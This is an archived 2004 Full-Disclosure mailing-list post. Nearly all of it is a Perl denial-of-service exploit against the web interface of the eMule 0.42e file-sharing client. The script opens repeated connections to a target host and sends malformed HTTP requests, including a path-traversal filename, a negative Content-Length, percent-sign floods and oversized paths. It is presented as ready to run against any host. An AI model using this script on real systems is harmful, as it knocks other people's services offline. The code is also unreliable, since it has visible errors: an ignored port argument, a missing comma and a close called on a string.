lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: Mon, 10 May 2004 19:36:52 +0200
From: "Rafel Ivgi, The-Insider" <theinsider@....net.il>
To: "bugtraq" <bugtraq@...urityfocus.com>
Subject: Emule 0.42e Remote Denial Of Service Exploit


#!/usr/bin/perl

system("cls");
# Emule 0.42e Remote Denial Of Service Exploit
# Coded by Rafel Ivgi, The-Insider:   http://theinsider.deep-ice.com
# usage: perl emule042e.pl <host> <port> <how many times>

use IO::Socket;
my $host = $ARGV[0];
my $port = $ARGV[1];
my $times = $ARGV[2];

if ($host)
{
unless($port) { $port="4711";}
unless($times) { $times="50";}
{
                print "Emule 0.42e Remote Denial Of Service Exploit
           Coded by The-Insider\n\n";
                print "[+] Connecting to target $host:$port\n";
for $i (1..$times) {
                $remote=IO::Socket::INET->new(Proto =>"tcp",
  PeerAddr => $host,
  PeerPort =>  80,
                                    Type => SOCK_STREAM
                                    Timeout => 8);

 unless ($remote)
                  {
                  die "can't connect to $host"
                  }
                  print "[+] Connected to target $host:$port\n";
                  print "[+] Sending Request\n";
 $remote ->autoflush(1);
print $remote "GET / HTTP/1.1
Content-Disposition: form-data; name=\"file\";
filename=\"../../../file.txt\"

";
print $remote "POST / HTTP/1.0
Content-Length: 10

123456789

";
print $remote "POST / HTTP/1.1
Content-Length: -1

";
print $remote "GET /%%%%%%%%%%%% HTTP/1.0

";
print $remote "index.htm

";
print $remote "GET
/aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaa HTTP/1.1

";
print $remote "GET
/aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaa

";
print $remote "GET c:\

";
                  print $remote "GET
/aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa HTTP/1.1

";
                  while(<$remote>)
                  {
                  $cool .= $_;
 if ($cool =~ /Server:/i)
                  {
                  close $cool;
                 -close $remote;
                  }
                  }
                  print "[+] Target Demolished.\n";
}}}
else
{
die "\nEmule 0.42e Remote Denial Of Service Exploit
Coded by Rafel Ivgi, The-Insider:   http://theinsider.deep-ice.com


usage: perl emule042e.pl <host> <port> <how many times>\n\n";
}

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Powered by blists - more mailing lists